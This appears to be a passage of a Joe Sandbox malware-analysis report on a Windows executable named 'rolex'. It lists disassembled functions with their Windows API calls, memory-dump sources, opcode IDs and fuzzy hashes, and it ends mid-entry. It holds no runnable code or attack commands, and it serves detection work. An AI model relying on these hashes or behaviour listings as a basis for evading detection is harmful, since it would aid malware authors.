                                                                                control_flow_graph 3921 7ff7ab4a2ce0-7ff7ab4a2d0a 3922 7ff7ab4a2d13-7ff7ab4a2d1b 3921->3922 3923 7ff7ab4a2d0c-7ff7ab4a2d0e 3921->3923 3925 7ff7ab4a2d2b 3922->3925 3926 7ff7ab4a2d1d-7ff7ab4a2d28 GetStdHandle 3922->3926 3924 7ff7ab4a2ea9-7ff7ab4a2ec4 call 7ff7ab4c2320 3923->3924 3928 7ff7ab4a2d31-7ff7ab4a2d3d 3925->3928 3926->3925 3930 7ff7ab4a2d3f-7ff7ab4a2d44 3928->3930 3931 7ff7ab4a2d86-7ff7ab4a2da2 WriteFile 3928->3931 3932 7ff7ab4a2daf-7ff7ab4a2db3 3930->3932 3933 7ff7ab4a2d46-7ff7ab4a2d7a WriteFile 3930->3933 3934 7ff7ab4a2da6-7ff7ab4a2da9 3931->3934 3936 7ff7ab4a2ea2-7ff7ab4a2ea6 3932->3936 3937 7ff7ab4a2db9-7ff7ab4a2dbd 3932->3937 3933->3934 3935 7ff7ab4a2d7c-7ff7ab4a2d82 3933->3935 3934->3932 3934->3936 3935->3933 3939 7ff7ab4a2d84 3935->3939 3936->3924 3937->3936 3938 7ff7ab4a2dc3-7ff7ab4a2dd8 call 7ff7ab49b4f8 3937->3938 3942 7ff7ab4a2dda-7ff7ab4a2de1 3938->3942 3943 7ff7ab4a2e1e-7ff7ab4a2e6d call 7ff7ab4c797c call 7ff7ab49129c call 7ff7ab49bca8 3938->3943 3939->3934 3942->3928 3944 7ff7ab4a2de7-7ff7ab4a2de9 3942->3944 3943->3936 3954 7ff7ab4a2e6f-7ff7ab4a2e86 3943->3954 3944->3928 3946 7ff7ab4a2def-7ff7ab4a2e19 3944->3946 3946->3928 3955 7ff7ab4a2e88-7ff7ab4a2e9b 3954->3955 3956 7ff7ab4a2e9d call 7ff7ab4c220c 3954->3956 3955->3956 3957 7ff7ab4a2ec5-7ff7ab4a2ecb call 7ff7ab4c7904 3955->3957 3956->3936
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$Handle
                                                                                • String ID:
                                                                                • API String ID: 4209713984-0
                                                                                • Opcode ID: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
                                                                                • Instruction ID: 5254ad7ba12f98062170209c19a866bde48b96b992b2926bfb6721927a592e00
                                                                                • Opcode Fuzzy Hash: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
                                                                                • Instruction Fuzzy Hash: 9151E822B1B64292FA50EB29D44477AA360FF85B94FC50135EA4D07AB5DF7CE485C320
                                                                                Function 00007FF7AB4C03E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                • String ID:
                                                                                • API String ID: 3750147219-0
                                                                                • Opcode ID: dd20fbc03e7b4ed3df35e7997b11e4c7c519625834bd32e30ad2cbcd1638632d
                                                                                • Instruction ID: 55f562f2eb3827f0c926e0db8522641bd26e337f5363a88f875de55c801a6707
                                                                                • Opcode Fuzzy Hash: dd20fbc03e7b4ed3df35e7997b11e4c7c519625834bd32e30ad2cbcd1638632d
                                                                                • Instruction Fuzzy Hash: 01518162F1675285FB00EBADD8452ADA362AF46FA4FC20635DA5C16BF6DF6CD440C320
                                                                                Function 00007FF7AB4A3684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2359106489-0
                                                                                • Opcode ID: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
                                                                                • Instruction ID: 27fcd6e0d90a06e449cffd979653b7180712e67236ea2d41a406cfb7a9d20432
                                                                                • Opcode Fuzzy Hash: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
                                                                                • Instruction Fuzzy Hash: 5731C666A0E74281EA60BB2DA44427DE361FF89B90FD24235EEDD436F5EF3CE4458610
                                                                                Function 00007FF7AB4C2D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 1452418845-0
                                                                                • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                • Instruction ID: 69c3d8c7a5a6db87cf8824e415289f0ddefc93b550224e576a9916bb1be1182c
                                                                                • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                • Instruction Fuzzy Hash: 98315D21E0F20355FA54BB6D94513BAA791AF43F84FC61434EA4E1B6F3DEACB8058274
                                                                                Function 00007FF7AB4A2320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                • String ID:
                                                                                • API String ID: 2244327787-0
                                                                                • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                • Instruction ID: 0cb02987e52fa8ecbfad03d1846fca7b47aa7bfa62e54e9f7507e541b7c27419
                                                                                • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                • Instruction Fuzzy Hash: 7621A421E0E55281EA60BF39A40023DE7A0FB46B98F964538DA5D4A6B4CF7CD8859720
                                                                                Function 00007FF7AB4AE948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4AECD8: ResetEvent.KERNEL32 ref: 00007FF7AB4AECF1
                                                                                  • Part of subcall function 00007FF7AB4AECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF7AB4AED07
                                                                                • ReleaseSemaphore.KERNEL32 ref: 00007FF7AB4AE974
                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00007FF7AB4AE993
                                                                                • DeleteCriticalSection.KERNEL32 ref: 00007FF7AB4AE9AA
                                                                                • CloseHandle.KERNEL32 ref: 00007FF7AB4AE9B7
                                                                                  • Part of subcall function 00007FF7AB4AEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AB4AE95F,?,?,?,00007FF7AB4A463A,?,?,?), ref: 00007FF7AB4AEA63
                                                                                  • Part of subcall function 00007FF7AB4AEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AB4AE95F,?,?,?,00007FF7AB4A463A,?,?,?), ref: 00007FF7AB4AEA6E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                                • String ID:
                                                                                • API String ID: 2143293610-0
                                                                                • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                • Instruction ID: ed575b674e2c441e3accea81a4ef6255f62a2287ffb98a7113174a36e4aefdf1
                                                                                • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                • Instruction Fuzzy Hash: 6B012D32A16A8192E689AB25E58427DF730FB88B80F814035DB6D03635CF39E4B58750
                                                                                Function 00007FF7AB4AEAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CreatePriority
                                                                                • String ID: CreateThread failed
                                                                                • API String ID: 2610526550-3849766595
                                                                                • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                • Instruction ID: ba2884b55e6802196ef48407788c9de69d51b1bd6523bc088ed3243be03d02ee
                                                                                • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                • Instruction Fuzzy Hash: A3116D32A0AA4281E700EF28E8415BAF370FB84B84FD54535EA5D03679EF3DE985C720
                                                                                Function 00007FF7AB4B946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryInitializeMallocSystem
                                                                                • String ID: riched20.dll
                                                                                • API String ID: 174490985-3360196438
                                                                                • Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                                                • Instruction ID: d90bf9cc5dccc0065b30eef883d22218939b5d214635d20da867187ee4977aa5
                                                                                • Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                                                • Instruction Fuzzy Hash: 6DF04F7261AA8182EB41AF28F4141AEF3A0FB88B54FC10135EA8D42775DFBCE159CB10
                                                                                Function 00007FF7AB4B095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4B853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7AB4B856C
                                                                                  • Part of subcall function 00007FF7AB4AAAE0: LoadStringW.USER32 ref: 00007FF7AB4AAB67
                                                                                  • Part of subcall function 00007FF7AB4AAAE0: LoadStringW.USER32 ref: 00007FF7AB4AAB80
                                                                                  • Part of subcall function 00007FF7AB491FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB491FFB
                                                                                  • Part of subcall function 00007FF7AB49129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7AB491396
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4C01BB
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4C01C1
                                                                                • SendDlgItemMessageW.USER32 ref: 00007FF7AB4C01F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                • String ID:
                                                                                • API String ID: 3106221260-0
                                                                                • Opcode ID: f59522d12ea67105d58c7d38a79467439e8b2bca94c98ae11b85d9bfed72e7d6
                                                                                • Instruction ID: 70a2b82c07edc594dc6ae973322e39a86513d32df0bc90c420bbdafaca37c755
                                                                                • Opcode Fuzzy Hash: f59522d12ea67105d58c7d38a79467439e8b2bca94c98ae11b85d9bfed72e7d6
                                                                                • Instruction Fuzzy Hash: 6451A462F0674256FB10BBB9D4452FDA362AB89B84F824135DE1D577FADE2CE500C360
                                                                                Function 00007FF7AB4B9F4C Relevance: 4.6, APIs: 3, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                • String ID:
                                                                                • API String ID: 2032784890-0
                                                                                • Opcode ID: 425ddadb74c4bc10119aa1baa60ba7c5a4f73d54acf5c20dfc24dcb126184bbf
                                                                                • Instruction ID: a29ce49b36518db5dd373132497f5330fbf6821e10ae1e81da7f5bca2bee1d3c
                                                                                • Opcode Fuzzy Hash: 425ddadb74c4bc10119aa1baa60ba7c5a4f73d54acf5c20dfc24dcb126184bbf
                                                                                • Instruction Fuzzy Hash: A8616D32A16B8199EB00EF78D8942BC7361EB45B98F824635DA1C13BBADF39E555C310
                                                                                Function 00007FF7AB4A2134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2272807158-0
                                                                                • Opcode ID: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
                                                                                • Instruction ID: 299486cc97623048a772680c6ca3a22b68ffd047e86efb36881e477981518444
                                                                                • Opcode Fuzzy Hash: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
                                                                                • Instruction Fuzzy Hash: 3941C573A0978182EB109B19E444279A7A1FB85BB4F915734DFAD03AF5CF3CD4908710
                                                                                Function 00007FF7AB4923F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2176759853-0
                                                                                • Opcode ID: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
                                                                                • Instruction ID: 987bebae0985bc52745ff27f3924eb2b3f0fbf5dcb64b726f96fbcf5cbc33107
                                                                                • Opcode Fuzzy Hash: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
                                                                                • Instruction Fuzzy Hash: 92219362A19B8181EA10AB69A44057AA364FB89BD0F554235EB9D03BB5DF3CD1408740
                                                                                Function 00007FF7AB4B1F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: std::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1875163511-0
                                                                                • Opcode ID: 473e069831e40b03067e3ac07c55198f41caec4ce5e3ab4939735fa524c57bef
                                                                                • Instruction ID: 82af6fc0fa6c7323aaa990493cf668d044a59dba331ec81a1f7ce4189a737b13
                                                                                • Opcode Fuzzy Hash: 473e069831e40b03067e3ac07c55198f41caec4ce5e3ab4939735fa524c57bef
                                                                                • Instruction Fuzzy Hash: 2B31D322A0A68692FF24BB6CE4443B9E7A0FB44B84F954031D34C066F9DF7CE956C311
                                                                                Function 00007FF7AB4A3D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1203560049-0
                                                                                • Opcode ID: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
                                                                                • Instruction ID: fcfe23a445d47e655f5cd04f83e2fcdc8ef0f6318a8663e415b19bc4c07e9f46
                                                                                • Opcode Fuzzy Hash: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
                                                                                • Instruction Fuzzy Hash: 2121DA22B1A78181FA20AF2DE44527EA361FF89B94F925234EE9D476F5EF3CD540C610
                                                                                Function 00007FF7AB4A31BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmpDownload File
